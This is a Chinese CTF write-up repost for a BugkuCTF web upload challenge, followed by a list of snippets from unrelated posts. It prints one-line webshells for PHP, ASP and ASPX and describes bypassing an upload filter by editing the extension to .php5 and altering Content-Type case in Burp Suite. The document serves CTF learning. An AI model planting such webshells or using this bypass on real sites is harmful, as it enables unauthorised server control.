2. 程式人生 > >BugkuCTF之web題之求getshell

BugkuCTF之web題之求getshell

阿新 發佈:2018-12-10

BugkuCTF之web題之求getshell

一進來發現:
在這裡插入圖片描述
maybe時繞過,那就用一句話木馬吧!!
php的一句話是:<?php @eval($_POST['pass']);?>
asp的一句話是:<%eval request ("pass")%>
aspx的一句話是:<%@ Page Language="Jscript"%> <%eval(Request.Item["pass"],"unsafe");%>
用文字寫好一句話之後,把字尾改成.jpg上傳
然後開啟Burp Suite開始抓包:
在這裡插入圖片描述
把1.jpg修改成.php5,把multipart/form-data;任意一個字母變成大寫。
在這裡插入圖片描述


得到flag!!

相關推薦

BugkuCTFwebgetshell

BugkuCTF之web題之求getshell 一進來發現: maybe時繞過,那就用一句話木馬吧!! php的一句話是:<?php @eval($_POST['pass']);?> asp的一句話是:<%eval request ("pass")%> aspx

BugkuCTFweb這是一個神奇的登陸框

BugkuCTF之web題之這是一個神奇的登陸框 開啟網頁之後發現: 隨便輸入賬號和密碼出現: 那就開始尋找注入點吧,輸入0’發現還是: 輸入0" 發現報錯: 確定可以注入,判斷欄位有多少個 0"order by 1,2,3# 發現: 說明有兩列。 輸入 0" union

BugkuCTFweb細心

BugkuCTF之web題之細心 一進網頁發現: 這是啥????(黑人問號)一臉的懵逼,檢視原始碼?發現幾個連結欸,點了幾下發現,然並卵。。。發現提示找不到檔案,那好吧,就一個一個來試試,試到robot.txt的時候發現:一般網站都會有robots.txt檔案的,存放可以直接訪問的檔案

BugkuCTFweb多次

BugkuCTF之web題之多次 點選進去發現是: 看見有個id,一個一個試一試,到id=5時,發現有提示: 可以確定了,這題是sql注入。 判斷一下是什麼注入,加上單引號出錯,加上#不出錯,加上’ and 1=1#又出錯了,應該是過濾,這時候我們就要判斷一下SQL網站過濾了什麼

BugkuCTF分析中國菜刀

BugkuCTF之分析題之中國菜刀 進入點選下載zip檔案,解壓用wireshark開啟。 搜尋HTTP. 點選第一個http包,選擇複製純文字。 去掉頭尾,在尾部加上==,用BASE64解碼 逐個分析。 看著$D應該是顯示檔案啥的!! 繼續走! 第二個是個顯示的文字,好像

演算法備戰計蒜客a+b問題

#include<iostream> #include<stdlib.h> using namespace std; int main() { int t; cin>>t;//輸入的行數 int a;//輸入的第一個數 int b;//輸入的第二個數

CTF每日一素數

 大概翻譯一下就是說,求一百萬以後的兩個素數,素數本身的位數加起來也得是素數 就是 23 是個宿舍 2+3 為5 5也是素數,這樣 ok,1百萬以後,這種題,默默的開啟QT ,想了一下還是關了,默默的開啟pycharm 。 程式碼貼上: from math import

LeetCode刷兩數之和

題目: 給定一個整數陣列和一個目標值,找出陣列中和為目標值的兩個數。 你可以假設每個輸入只對應一種答案,且同樣的元素不能被重複利用。 示例: 給定 nums = [2, 7, 11, 15], target = 9 因為 nums[0] + nums[1] = 2 + 7 = 9 所

web前端面試送分

前端入門很容易,簡單地用html搭一個頁面框架;會用一些css基本樣式;懂得用jquery的dom互動,就基本可以挺著胸說自己是個前端工程師了。 但是前端提升異常艱難,演算法、資料結構、oop;javascript、dom、css、html5這些僅僅是標配;效能優化、安全性、程式碼

程式設計師面試100子陣列的最大和

                        題目:輸入一個整形陣列,數組裡有正數也有負數。陣列中連續的一個或多個整陣列成一個子陣列,每個子陣列都有一個和。求所有子陣列的和的最大值。要求時間複雜度為O(n)。       例如輸入的陣列為1, -2, 3, 10, -4, 7, 2, -5,和最大的子陣列為

演算法 程式設計N內的素數

題目描述 用篩法求之N內的素數。 輸入 N 輸出 0~N的素數 樣例輸入 100 樣例輸出 2 3 5 7 11 13 17 19 23 29 31 37 41 43 47 53 59 61 67 71 73 79 83 89 97 程式設計程式碼如下:

CTFweb這道很簡單

1、輸入【’】報錯,發現注入 2、輸入【and 1=1】正常,輸入【and 1=2】不正常,證明就是SQL注入 3、sqlmap進行SQL注入,這個可以通過linux虛擬機器進行操作,也可以直接在windows作業系統中安裝sqlmap進行操作,這個在我

OJ刷Sn=a+aa+aaa+…+aa…aaa(有n個a)

問題及程式碼: /* * Copyright (c) 2014, 煙臺大學計算機與控制工程學院 * All rights reserved. * 檔名稱:test.cpp * 作 者:郝俊宇 * 完成日期:2015年 1 月8 日 * 版 本

POJ 2249 Binomial Showdown(我的水路——n個數裡取m個數的值)

Binomial Showdown Time Limit: 1000MS Memory Limit: 65536K Total Submissions: 15158 Accepted: 4629 Description In how many ways can

ACM刷第二小整數

Problem Description 求n個整數中倒數第二小的數。 每一個整數都獨立看成一個數,比如,有三個數分別是1,1,3,那麼,第二小的數就是1。 Input 輸入包含多組測試資料。 輸入的第

C/C++程式設計兩個數的最大公約數和最小公倍數

求兩個數的最大公約數和最小公倍數 方法:最大公約數使用輾轉相除法求,最小公倍數等於兩個數的乘積/最大公約數 輾轉相除法的原理:用輾轉相除法求幾個數的最大公約數,先求出其中任意兩個數的最大公約數,再

OJ刷迭代法平方根

問題及程式碼: /* * Copyright (c) 2014, 煙臺大學計算機與控制工程學院 * All rights reserved. * 檔名稱:test.cpp * 作 者:郝俊宇 * 完成日期:2015年 1 月8 日 * 版 本

微軟面試10019:定義Fibonacci 數列如下,用最快的方法該數列的第n 項

題目:定義Fibonacci 數列如下:/ 0 n=0f(n)= 1 n=1\ f(n-1)+f(n-2) n=2輸入n,用最快的方法求該數列的第n 項。分析:在很多C 語言教科書中講到遞迴函式的時候,都會用Fibonacci 作為例子。因此很多程式設計師對這道題的遞迴解法

web安全同源策略

rip 瀏覽器中 屬性。 名單 java get message 否則 cookie 為什麽使用同源策略?一個重要原因就是對cookie的保護,cookie 中存著sessionID 。如果已經登錄網站,同時又去了任意其他網站,該網站有惡意JS代碼。如果沒有同源策略,那麽這

Python3 Web 框架:web框架的本質

但是 hub ima sgi 控制器 borde http ace esp 各位,學Python 的同誌,相信對 Django 、Flask、等不會陌生,這些就是Python語言的web 框架。 那麽問題來了,web 服務器又是什麽,他和web框架有什麽關系?他們又是如何工